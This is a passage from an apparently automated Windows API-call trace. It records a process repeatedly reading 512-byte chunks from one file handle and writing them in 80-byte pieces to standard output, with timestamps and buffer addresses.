lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] GetFileType (hFile=0x50) returned 0x1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] GetFileType (hFile=0x50) returned 0x1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] GetFileType (hFile=0x50) returned 0x1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.156] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.156] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] GetFileType (hFile=0x50) returned 0x1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] GetFileType (hFile=0x50) returned 0x1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.156] GetFileType (hFile=0x50) returned 0x1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] GetFileType (hFile=0x50) returned 0x1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] GetFileType (hFile=0x50) returned 0x1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] GetFileType (hFile=0x50) returned 0x1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] GetFileType (hFile=0x50) returned 0x1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] GetFileType (hFile=0x50) returned 0x1 [0144.157] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.157] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.157] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.157] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.158] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] GetFileType (hFile=0x50) returned 0x1 [0144.158] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.158] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] GetFileType (hFile=0x50) returned 0x1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.159] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.159] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.159] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.159] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] GetFileType (hFile=0x50) returned 0x1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] GetFileType (hFile=0x50) returned 0x1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] GetFileType (hFile=0x50) returned 0x1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.159] GetFileType (hFile=0x50) returned 0x1 [0144.159] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] GetFileType (hFile=0x50) returned 0x1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] GetFileType (hFile=0x50) returned 0x1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] GetFileType (hFile=0x50) returned 0x1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] GetFileType (hFile=0x50) returned 0x1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.160] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.160] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] GetFileType (hFile=0x50) returned 0x1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.160] GetFileType (hFile=0x50) returned 0x1 [0144.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] GetFileType (hFile=0x50) returned 0x1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] GetFileType (hFile=0x50) returned 0x1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] GetFileType (hFile=0x50) returned 0x1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] GetFileType (hFile=0x50) returned 0x1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] GetFileType (hFile=0x50) returned 0x1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] GetFileType (hFile=0x50) returned 0x1 [0144.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.161] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.162] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.162] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] GetFileType (hFile=0x50) returned 0x1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] GetFileType (hFile=0x50) returned 0x1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] GetFileType (hFile=0x50) returned 0x1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] GetFileType (hFile=0x50) returned 0x1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] GetFileType (hFile=0x50) returned 0x1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] GetFileType (hFile=0x50) returned 0x1 [0144.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.162] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] GetFileType (hFile=0x50) returned 0x1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] GetFileType (hFile=0x50) returned 0x1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.163] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.163] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.163] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.163] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] GetFileType (hFile=0x50) returned 0x1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] GetFileType (hFile=0x50) returned 0x1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] GetFileType (hFile=0x50) returned 0x1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] GetFileType (hFile=0x50) returned 0x1 [0144.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.163] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] GetFileType (hFile=0x50) returned 0x1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] GetFileType (hFile=0x50) returned 0x1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] GetFileType (hFile=0x50) returned 0x1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] GetFileType (hFile=0x50) returned 0x1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.164] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.164] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.164] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.164] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] GetFileType (hFile=0x50) returned 0x1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] GetFileType (hFile=0x50) returned 0x1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] GetFileType (hFile=0x50) returned 0x1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] GetFileType (hFile=0x50) returned 0x1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] GetFileType (hFile=0x50) returned 0x1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] GetFileType (hFile=0x50) returned 0x1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] GetFileType (hFile=0x50) returned 0x1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] GetFileType (hFile=0x50) returned 0x1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: 